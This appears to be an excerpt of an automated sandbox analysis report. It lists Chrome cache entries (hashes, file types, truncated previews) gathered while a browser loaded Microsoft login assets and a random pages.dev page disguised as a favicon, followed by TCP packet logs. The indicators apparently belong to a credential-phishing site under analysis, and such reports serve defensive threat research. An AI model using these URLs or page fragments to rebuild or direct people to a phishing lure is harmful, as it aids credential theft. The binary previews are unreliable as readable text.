Preview:	...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q.....~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1......#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...

Chrome Cache Entry: 168

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
Category:	dropped
Size (bytes):	1435
Entropy (8bit):	7.8613342322590265
Encrypted:	false
SSDEEP:	24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
MD5:	9F368BC4580FED907775F31C6B26D6CF
SHA1:	E393A40B3E337F43057EEE3DE189F197AB056451
SHA-256:	7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
SHA-512:	0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
Malicious:	false
Reputation:	low
Preview:	...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.\|..~.\|{~...b{8...zv.....8\|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.\|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dgN.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f;.....Zhrr.,.U....6.Y....+Zd.R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.

Chrome Cache Entry: 169

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 90678
Category:	dropped
Size (bytes):	32811
Entropy (8bit):	7.993115726308211
Encrypted:	true
SSDEEP:	768:Tu4jwkrxI2adXpo9SSwpmUPieDFpfy2Ky4lS4ru4r0r:300CfRpFpmAieDFpfBbWbru4r0r
MD5:	BCD68C8A4F1BB13B272E02FDA0EB5460
SHA1:	57C81EE13D027556D54744C9246226E1E85C211C
SHA-256:	25D5832DE46E5170761BA826342655D7C5550451332E4086EC366E79D359BD51
SHA-512:	0D70D7476653949F79CC67897F9F36E6B2F503E5C308C59D0C349B841BC2A27CD6408ACB272568CCA6B593AF5060F93FADD217D1677DE0E897608BA3BBFB0493
Malicious:	false
Reputation:	low
Preview:	...........kW.H.?..\|.[g.[...$..Q..B&....e.a.....F.H2.`..S..Z.H..>..5..Z....U.U..~m.^.Yk..d..V.L..2.4i.2..\.V..q..%....G..?..Q..=.u..'..&.G...?y........N.h.z....h...Q...\N'.ky:.F.......2..2)...$..9...j-.G.Ag6..........mos.G..<...~".(....2.Eg.Kq.l6.M.....L....L..,i.....".0.L..DK.\|.d.....;..>QS....r/e...O.gq.Ps./..4...ZA...c.O...[...f......"..4..{......,.b.@.6d2.i..{....&..>.......Q......Q.4.W.....!.'...~...J~.QrF.=;.W2#<i...z..N..$...,N..z.P.....3...'..".h.yG+......>.^.....k.Y:.Y...N..............B...S......5r.E#.........O.t...I..~...3.4%.G.....I........(M/b..*.....SB.3Y......I. .,E.?..i.s.s...$?..f....?.$WLS".M.....{.=.P.~~y.1..uZ2..=!.U.`.s.....n.c...x......O.3B...q...r........).D.z..?.H.HCo...$..<..{./.a.ei..73)F...+"..Q&.JbJ..M..n.$.w.\|.:1Y.....OJ...&..t.:..<M.kk^....NL8..i6,w....,.....y...0...#j;.C..6.%$..o}.A.q-..0.O..g..U..[]j.:.'a...C...2.x..50.\|..}gBlg..i4=<..S...eA.P.S....L.&.Z.f]k.YA@.J......._.!I.k-.L.....XP....{.....i.

Chrome Cache Entry: 170

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 900
Category:	dropped
Size (bytes):	252
Entropy (8bit):	7.057986237150363
Encrypted:	false
SSDEEP:	6:Xth1WIxjFLw0cb88da94jE0CadKSPfN8IC6a8r0ADAgvw9xwi:Xf1WMlcb5a92EGZa6JmUUxh
MD5:	19AA49E6F345811CEBE895003C8FCFC7
SHA1:	48D93BEDEFFE842A3DFB5D3036D14178D97115F9
SHA-256:	F61DC276446B263FC29B1A8CE20D8BFD2C028F4603356F795687B942E3B4969F
SHA-512:	6A2E4E29D0FDBFD0E671A88CB6411AA7401524C3DDF903AB8E766B4CD66C9C31E0D175592920D29D3CF0CD67D6FA6763F6A0D4A5286EEC48F77028A36054E642
Malicious:	false
Reputation:	low
Preview:	...........S.. ...q.cl.&...}.....1..Uj?.jR..&......8..h.G....jl..n8.!.P...+....Fa8x[c.0...[?..........'n....kZ.:...w..z..5..&dA.+..1h2".!..R1(.t..SJ.N+......VV._...y.D_..3"4...e;. ]RA...r..VR-..I..DO.9Y...a{A\&.xr{.H.K\...f.?.7&}..........

Chrome Cache Entry: 171

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65451)
Category:	dropped
Size (bytes):	89476
Entropy (8bit):	5.2896589255084425
Encrypted:	false
SSDEEP:	1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
MD5:	DC5E7F18C8D36AC1D3D4753A87C98D0A
SHA1:	C8E1C8B386DC5B7A9184C763C88D19A346EB3342
SHA-256:	F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
SHA-512:	6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
Malicious:	false
Reputation:	low
Preview:	/! jQuery v3.5.1 \| (c) JS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o

Chrome Cache Entry: 172

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (918)
Category:	downloaded
Size (bytes):	1233
Entropy (8bit):	5.4604704891374
Encrypted:	false
SSDEEP:	24:hY/LLuvW9BokgrY7cMdhwCBie46Tz1QqIJIzcq9X5wXR5viRX4j:bCo5Y73hwCd4olUItp5wrNj
MD5:	5DC258F6742F6D22A4CD80F50926ED70
SHA1:	2925F965C31990E0F883E2E885A3D57056168DCC
SHA-256:	3B8D3C93FD78C24F4C175C8515E4A5DF79AEE536AF4CED58BA078EA591569EAC
SHA-512:	BB63B3078587A823CCBB2314EFF3CCC16B20A01AC717CE37289DA8B5118E5053F867CE62256CC1C9466A7E2CBF60C854F4DEA68A060D67CC51BAAB17179E140C
Malicious:	false
Reputation:	low
URL:	https://msft.hsprotect.net/index.html
Preview:	<!DOCTYPE html>.<html lang='en'>.<head>. <meta charset='UTF-8'>. <meta name='viewport' content='width=device-width, initial-scale=1.0'>. <title>Human Sensor Script Iframe</title>.</head>.<body>.<script>. var a=["_pxvid","_px3","_pxde"];function b(a){var b=new RegExp("(^\| )"+a+"=([^;]+)"),c=document.cookie.match(b);return c?c[2]:null}function c(a,b,c){window.parent.postMessage({type:"cookie",name:a,value:b,expires:c\|\|new Date(Date.now()+31536e6).toUTCString()},"")}function d(a){var b=/^([^=]+)=([^;])/,c=/expires=([^;]+)/,d=a.match(b),e=d?d[1]:null,f=d?d[2]:null,g=a.match(c),h=g?g[1]:null;return{cookieName:e,cookieValue:f,expires:h}}function e(b){var e=d(b);-1!==a.indexOf(e.cookieName)&&c(e.cookieName,e.cookieValue,e.expires)}function f(){try{var a=Object.getOwnPropertyDescriptor(Document.prototype,"cookie")\|\|Object.getOwnPropertyDescriptor(Object.getPrototypeOf(document),"cookie"),b=a.get.bind(document),c=a.set.bind(document);Object.defineProperty(document,"cookie",{get:fu

Chrome Cache Entry: 173

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 37866
Category:	downloaded
Size (bytes):	11322
Entropy (8bit):	7.981429816295758
Encrypted:	false
SSDEEP:	192:5huV16G+7DgZUyKsY4AmqySBLua33PWHGxMXTnRsMxuCWcdP02qXOtsOn:zuF+9sY4eB5vWJNZWcdPZn
MD5:	E59C3B1EB6862A6333488A00880D79C4
SHA1:	D8FB445F630639C45CCC05AA32A3C5D7FBB10504
SHA-256:	5DD6A7B363CEE654DDA1429F225F367716A621E77080485E30A2F4D12DBA5241
SHA-512:	2E658DA38D744B212DB6FA507603792DBA0AC5DA7CF8B13B3B824F068FD29E1B89DEDDE87196E96F0C23F562F0E4707F1CC89B18FD3FECB1E9DE2AA4E5D83D1F
Malicious:	false
Reputation:	low
URL:	https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_yruqtyo0qslo70l4a-_ung2.js
Preview:	...........}.v.I..._...i.S)..\|B..A..0.....U....D..l..pfB...9....^{.W^z.?e.....#"2.......-( .7n.q_q#....^............K.G..P...sY\|^.a....V...,k<<....e..m....Zv..u.,./c.....sp._.[.w........PP^5....M..........<..1..... ..v@X.M.e....G.v.....N3,O...o..N.9~.s...[.ep/.+..=.M.k../...b.N.M8./KQ..lsL".(__.&..l....u..?.Z.....l>..R;.N,,...a....r..`..%{......7......=%.. ..s.>.4.f./. ....M...\^D...F..o....X..#..f..^......[....l:.v...\|..d..M.C.Z,..JP.7%...(a...8 .v..@.Yo.T..?.r......^{./...J..^9.....^U+...^.....]@.......'\|w.....~g...s ..s.N.KSzS..k..3..a...# ....T..6qy..+'~..p.a...{....3&..v...Co....?$\|.V...Ow=x.........v......a.D...X...m}1..ic..".v.t.{.7/~.6..\Z7..Q.....M.v...f.ab......k,...Y...+$h.+>..YAhE"...,wVod9...(j..u...`U.,[....sg......,/..z..H...+..,.i..[....4..@-.I.;.>._4~.....H0......9.......r..%.E.Y...;....b!.Fq.P.u.\|....s.5%.....E..}5"3.&..5$)..a..r.&0 ...z/.W..G.{a....N....w{.[~p_.FK.s.E..[...........]9.r....,.s..$uT>..

Chrome Cache Entry: 174

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	244
Entropy (8bit):	3.9634781344858276
Encrypted:	false
SSDEEP:	6:hllFSaF4dJdXyCq+YVBi7rxGuREVVEVsJqrtBYiDJVlXYWM2:XlFhqlF4g7FCVV864hDJHX7M2
MD5:	4346604E8867F2429843AD74A53991DE
SHA1:	062AF3D05BF169B583ADABA8C4B74C140458A9A4
SHA-256:	7AB07EB615976D1DDD593A1C3AECCDA7E256AA5F3475D96D6512D849B18F617B
SHA-512:	0890AFB3DF1F0D644E4CF21DA4C8AFE70AA2335FA74FD1FDFED51B106BB223C06EC14CA153BFF0EA407109F8E567CEE98DF617F16109E6373AD1EF201A5486A2
Malicious:	false
Reputation:	low
URL:	https://stk.hsprotect.net/ns?c=0d95f950-67ec-11ef-8c21-4b98fcd4657e
Preview:	df378afdb4f25dd0559641c3a0491a8b466c8b3481d8230a087f297a6d2659922b4b259e0539504a38b765d30c5b24e1e2b01a0dfa82081287442b3156ae71fbf59d52f782d6781104f5b6b9a0494b79c3f12a87e3dda8ec96f8a7f0cf71da101d6fb8ba1d7c4be64fbd9bc2d47c1b6f7dcdc299d3a049769411

Chrome Cache Entry: 175

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 915
Category:	dropped
Size (bytes):	263
Entropy (8bit):	7.109710006180472
Encrypted:	false
SSDEEP:	6:Xt45qzoyr7SEpx2nsOcigQRwU9EEXBBLVtGuDNZjg/BW7/:Xm5qz7ShsBig8fj3TjgJY
MD5:	FDADF2FE6A40F8745A54088F002AECA2
SHA1:	CE8A4413ABA3B2035EF4C48D46D76EABE4DDA4B0
SHA-256:	AA6593B23F2559FE0C239B25F9AD9B2BC79437AE5EE23E412E13D148AB5B6B86
SHA-512:	CD99227F63AB606911AAC42BBDD132FF1AC0B243C64288BB23B8B44F54FEEF3D130882B21E3402C22C45FF5DD15D0CF16494A66FB1896AA46D95ACAF999EE837
Malicious:	false
Reputation:	low
Preview:	...........S.n. ...D.,CM...Rz...f)...,(........CY....yo$....~....1....1F.+v...3..t...a.X(....c......n1 @B..[.\........d.]...&..t...->.&dE..w.K6h2#.)..R1...Tr.%.@.].b.9...M.3.~.y.D..WHh.0..n.A..f....:.m...K3.C..=y.).......J.J........j!.."......~.5$......

Chrome Cache Entry: 176

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
Category:	downloaded
Size (bytes):	3452
Entropy (8bit):	5.117912766689607
Encrypted:	false
SSDEEP:	96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
MD5:	CB06E9A552B197D5C0EA600B431A3407
SHA1:	04E167433F2F1038C78F387F8A166BB6542C2008
SHA-256:	1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
SHA-512:	1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
Malicious:	false
Reputation:	low
URL:	https://login.live.com/Me.htm?v=3
Preview:	<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s(\w+)\s=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p\|\|s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("\|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.

Chrome Cache Entry: 177

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 90678
Category:	downloaded
Size (bytes):	32811
Entropy (8bit):	7.993115726308211
Encrypted:	true
SSDEEP:	768:Tu4jwkrxI2adXpo9SSwpmUPieDFpfy2Ky4lS4ru4r0r:300CfRpFpmAieDFpfBbWbru4r0r
MD5:	BCD68C8A4F1BB13B272E02FDA0EB5460
SHA1:	57C81EE13D027556D54744C9246226E1E85C211C
SHA-256:	25D5832DE46E5170761BA826342655D7C5550451332E4086EC366E79D359BD51
SHA-512:	0D70D7476653949F79CC67897F9F36E6B2F503E5C308C59D0C349B841BC2A27CD6408ACB272568CCA6B593AF5060F93FADD217D1677DE0E897608BA3BBFB0493
Malicious:	false
Reputation:	low
URL:	https://logincdn.msauth.net/shared/5/chunks/oneds-analytics-js_8c01a5c09df43fd8d323.js
Preview:	...........kW.H.?..\|.[g.[...$..Q..B&....e.a.....F.H2.`..S..Z.H..>..5..Z....U.U..~m.^.Yk..d..V.L..2.4i.2..\.V..q..%....G..?..Q..=.u..'..&.G...?y........N.h.z....h...Q...\N'.ky:.F.......2..2)...$..9...j-.G.Ag6..........mos.G..<...~".(....2.Eg.Kq.l6.M.....L....L..,i.....".0.L..DK.\|.d.....;..>QS....r/e...O.gq.Ps./..4...ZA...c.O...[...f......"..4..{......,.b.@.6d2.i..{....&..>.......Q......Q.4.W.....!.'...~...J~.QrF.=;.W2#<i...z..N..$...,N..z.P.....3...'..".h.yG+......>.^.....k.Y:.Y...N..............B...S......5r.E#.........O.t...I..~...3.4%.G.....I........(M/b..*.....SB.3Y......I. .,E.?..i.s.s...$?..f....?.$WLS".M.....{.=.P.~~y.1..uZ2..=!.U.`.s.....n.c...x......O.3B...q...r........).D.z..?.H.HCo...$..<..{./.a.ei..73)F...+"..Q&.JbJ..M..n.$.w.\|.:1Y.....OJ...&..t.:..<M.kk^....NL8..i6,w....,.....y...0...#j;.C..6.%$..o}.A.q-..0.O..g..U..[]j.:.'a...C...2.x..50.\|..}gBlg..i4=<..S...eA.P.S....L.&.Z.f]k.YA@.J......._.!I.k-.L.....XP....{.....i.

Chrome Cache Entry: 178

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (17527), with CRLF line terminators
Category:	downloaded
Size (bytes):	19183
Entropy (8bit):	6.1371082440115075
Encrypted:	false
SSDEEP:	384:eOPZ0j1RQTqbGOe4hacHGF6Q8QqoL11VvpoKw1oPjF12NQKLOKx2WSAI2v:ehjQTqbG2dHGsp+TVvyjIBKL/FcE
MD5:	C69BC69003105B2B051AB2D11E59C2C7
SHA1:	DF19B5D9568E24C9C3FD74A8E76B6AEFFB9C49BF
SHA-256:	9808503F6D4D8C80E656A3AB96DA9D57AA91DBA35AC51F77F028DBC4760ED8BC
SHA-512:	EDFCC7915314277B7187ECB1539233ECD6FF24A963CE37C93D571092C809994F4C1FA6D228D4495DD9FC2BD67013D71FC8C2251839EA3FA278DB0EB1D5339A7B
Malicious:	false
Reputation:	low
URL:	https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/favicon.ico
Preview:	<div id="hbg" style="width: 100px;margin: 0 auto; 0 auto;visibility:hidden;">..<img style="width: 100%;" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAMgAAAC5CAYAAABtJnD6AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsIAAA7CARUoSoAAADLFSURBVHhe7X0JlF1Heebf6l3dUmtt7bssW5IXyRteRmCMIdgmDNsMYJyQnMQBkwQSkjOcMRmGsDg5IROWIQkMMIlDMJCFkBBIYMCGAMYLtmXZ8ibv2ltLt9Qt9d5vvq9u1e269ered+97vbx+fb/T1bfqr7+2W/Xdqr/u8iRHjhzxqNPH2Yd33bVRCoVd8G2Da4crUJyjJnAabo/U1f2HfP7aQ4GoPMw+grzrB2tlrPBR+N4CN1fJctQqekCSO2TOnI/I5155UssyYXYR5F13vVLGxr4GX2cgyDFLsA/uzfKF6x4NgukxewjyGz+4DEuqu+DjcirH7MMBzCS7sOR6QYdTYY4+1jZu/WELyPEF+HJyzF6sxhj4c+1PjdlBkNHRt+P/RUEgx6xFoXADVhKv0qFUmB0EKRRIkBw5iLfpYyrUPkHeffdC/D8/COSY9SgULpXfvz/1uJ8NM0gH3PzAmyOHLJbTvW3aXxK1T5C6utl7MzSHD3WYRVKPidlhg+TIUSZyguTIkYCcIDlyJCAnSI4cCcgJkiNHAnKC5MiRgJwgOXIkICdIjhwJyAmSI0cCcoLkyJGAnCA5ciQgJ0iOHAnICZIjRwJyguTIkYCcIDlyJCAnSI4cCaj9l4luvXuDjIw8KgVJ/RZZ1aAwAz/2OKaP1YsDcNvlr17Dry+WRO0T5L0/A0FG+cGwmUWQlnqRJriZxBGuR9oaq31UHUD9tsttO3OCKNz2xAYp1IEgdTOHIGNg

Chrome Cache Entry: 179

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	low
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Static File Info

⊘No static file info

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 1, 2024 00:54:21.859705925 CEST	49674	443	192.168.2.6	173.222.162.64
Sep 1, 2024 00:54:21.859781981 CEST	49673	443	192.168.2.6	173.222.162.64
Sep 1, 2024 00:54:22.187832117 CEST	49672	443	192.168.2.6	173.222.162.64
Sep 1, 2024 00:54:31.289252996 CEST	49715	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:31.289287090 CEST	443	49715	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.289360046 CEST	49715	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:31.289684057 CEST	49716	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:31.289714098 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.289781094 CEST	49716	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:31.289892912 CEST	49715	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:31.289904118 CEST	443	49715	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.290086031 CEST	49716	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:31.290100098 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.321897984 CEST	49717	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:31.321908951 CEST	443	49717	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:31.321979046 CEST	49717	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:31.322613001 CEST	49717	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:31.322618961 CEST	443	49717	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:31.500842094 CEST	49674	443	192.168.2.6	173.222.162.64
Sep 1, 2024 00:54:31.569833994 CEST	49673	443	192.168.2.6	173.222.162.64
Sep 1, 2024 00:54:31.749866009 CEST	443	49715	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.750163078 CEST	49715	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:31.750185966 CEST	443	49715	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.751190901 CEST	443	49715	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.751271963 CEST	49715	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:31.752341986 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.752504110 CEST	49715	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:31.752567053 CEST	443	49715	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.752893925 CEST	49716	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:31.752921104 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.753164053 CEST	49715	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:31.753170013 CEST	443	49715	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.753937006 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.754003048 CEST	49716	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:31.754331112 CEST	49716	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:31.754384995 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.885385036 CEST	49672	443	192.168.2.6	173.222.162.64
Sep 1, 2024 00:54:31.885394096 CEST	49715	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:31.885392904 CEST	49716	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:31.885406017 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.915344954 CEST	443	49715	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.915393114 CEST	443	49715	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.915419102 CEST	443	49715	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.915441990 CEST	443	49715	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.915466070 CEST	443	49715	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.915478945 CEST	49715	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:31.915491104 CEST	443	49715	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.915544033 CEST	49715	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:31.915549994 CEST	443	49715	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.916183949 CEST	443	49715	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.916207075 CEST	443	49715	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.916244984 CEST	49715	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:31.916251898 CEST	443	49715	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.920188904 CEST	443	49715	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.920281887 CEST	49715	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:31.920288086 CEST	443	49715	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:31.922250986 CEST	49715	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:31.999830961 CEST	49716	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:32.002305031 CEST	443	49715	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:32.002373934 CEST	443	49715	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:32.002401114 CEST	443	49715	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:32.002494097 CEST	49715	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:32.002496958 CEST	443	49715	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:32.002613068 CEST	49715	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:32.003210068 CEST	49715	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:32.003226995 CEST	443	49715	172.66.47.137	192.168.2.6
